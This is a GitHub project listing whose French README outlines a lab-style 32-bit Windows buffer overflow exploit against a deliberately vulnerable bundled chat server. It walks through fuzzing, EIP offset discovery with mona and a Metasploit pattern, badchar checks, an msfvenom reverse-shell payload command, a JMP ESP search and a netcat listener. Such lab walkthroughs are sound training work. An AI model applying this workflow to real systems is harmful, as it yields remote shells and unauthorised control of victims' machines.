https://github.com/processust/exploitation-buffer-overflow-windows-32-bits-
https://github.com/processust/exploitation-buffer-overflow-windows-32-bits-
Last synced: 5 days ago
JSON representation
- Host: GitHub
- URL: https://github.com/processust/exploitation-buffer-overflow-windows-32-bits-
- Owner: ProcessusT
- Created: 2022-06-10T12:09:42.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2022-06-10T12:12:00.000Z (over 3 years ago)
- Last Synced: 2025-03-25T08:01:37.156Z (10 months ago)
- Language: Python
- Size: 26.4 KB
- Stars: 2
- Watchers: 1
- Forks: 2
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Exploitation-Buffer-Overflow-Windows-32-bits
Scripts de fuzzing et d'exploitation de buffer overflow 32 bits sous Windows
Les fichiers chatserver.exe et essfunc.dll sont incluent pour tester les scripts (Attention, l'application est vulnérable)
La liste des commandes est disponible dans le fichiers COMMANDS.txt
------------------------------------------------------------------------------------------
# Dans immunity on créer un nouveau workspace :
!mona config -set workingfolder c:\mona\%p
# On fuzz le binaire pour trouver l'offset qui créera le segfault avec le script fuzzing.py
# On créer un pattern avec metasploit pour trouver l'offset d'EIP
msf-pattern_create -l 2400
# On prend un template d'exploit et on ajoute notre pattern en tant que payload pour détecter le segfault
# On Retrouve l'offset exacte d'EIP au moment du crash
!mona findmsp -distance 2400
# On met à jour l'offset dans le script d'exploit et on recherche les badchars
# On créer un tableau de badchars avec mona
!mona bytearray -b "\x00"
# On génère une chaîne de badchars qu'on ajoute en tant que payload dans le script d'exploit
# On compare les badchars avec l'offset d'ESP au moment du crash
!mona compare -f C:\mona\\bytearray.bin -a
# On génére un shellcode avec metasploit excluant les badchars
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -b "" -f py
# On trouve un offset de jump sur ESP avec mona pour exécuter le shellcode
!mona jmp -r esp -cpb ""
# On met à jour l'offset du retn dans le script d'exploit et on ajoute des NOPS (16 c'est pas mal)
# On démarre un netcat en local et on exploite :)